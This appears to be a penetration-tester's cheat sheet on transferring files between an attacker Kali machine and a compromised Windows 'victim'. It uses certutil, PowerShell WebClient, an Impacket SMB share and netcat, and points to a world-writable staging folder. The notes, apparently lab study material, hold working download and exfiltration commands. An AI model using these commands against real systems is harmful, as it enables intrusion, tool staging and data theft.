CertUtil transfer:
certutil -urlcache -split -f http://192.168.119.201 winPEAS.exe
-hosting winpeas on port 80 on kali machine
-wont transfer large files properly
Powershell file transfer :
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://IP/winpeas64.exe','C:\Users\Public\winpeas.exe')"
Impacket smb server file transfer
on kali:
python3 /usr/share/doc/python3-impacket/examples/smbserver.py hello /root/Desktop/winpeas
on victim windows machine:
Copy \\192.168.119.201\hello\winpeas
Netcat transfer :From windows to kali
For this method you should already have nc.exe transferred
On victim windows:
C:\Users\Administrator> nc.exe 192.168.119.201 4444 < "C:\Users\xyz\winpeas.txt"
On your kali machine:
root@kali# nc -nvlp 4444 >winpeas.txt
Other tips:
Windows world writable file : C:\Windows\system32\spool\drivers\color